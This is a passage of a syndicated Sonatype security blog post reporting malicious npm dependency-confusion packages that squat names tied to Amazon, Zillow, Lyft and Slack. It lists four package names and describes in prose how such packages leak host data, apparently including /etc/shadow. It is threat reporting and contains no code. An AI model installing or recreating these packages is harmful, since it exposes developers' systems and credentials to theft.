Newly Identified Dependency Confusion Packages Target Amazon, Zillow, and Slack; Go Beyond Just Bug Bounties

Sonatype has identified new “dependency confusion” packages published to the npm ecosystem that are malicious in nature.

These squatted packages are named after repositories, namespaces or components used by popular companies such as Amazon, Zillow, Lyft, and Slack.

The malicious packages include:

  • amzn
  • zg-rentals
  • lyft-dataset-sdk
  • serverless-slack-app

As previously reported by Sonatype, Alex Birsan’s dependency confusion research disclosure led to copycat researchers publishing 275+ identical packages to the npm repo within 48 hours, in hopes of scoring bug bounties. The number then jumped to over 550 within the next few days.

As of today, Sonatype’s automated malware detection systems, part of Nexus Intelligence, has since identified well over 700 npm copycat packages based on Birsan’s proof-of-concept packages.

Although ethical hacking for bug bounties and spreading security awareness has its place and is even welcomed by the community as it keeps us all more secure, the copycat packages recently identified by Sonatype unfortunately crosses the line of what is deemed ethical.

What’s inside your /etc/shadow?

Most of the copycat packages spotted by Sonatype that exploited the “dependency or namespace confusion” issue across various open source ecosystems, did so by exfiltrating minimal information – just enough to get a proof to present to a bug bounty program.

For example, this would typically involve the researcher making a DNS request from the successfully breached machine to their own server, and collecting information such as the computer’s hostname and IP address.

The new packages discovered by Sonatype however go a step further.

First of all, many of these have no disclaimers or code comments in place indicating these are linked to any kind of ethical bug bounty program, or created for security research purposes. While having such a disclaimer in place is no guarantee that a package’s author is working in good faith, (Read more...)

*** This is a Security Bloggers Network syndicated blog from Sonatype Blog authored by Ax Sharma. Read the original post at: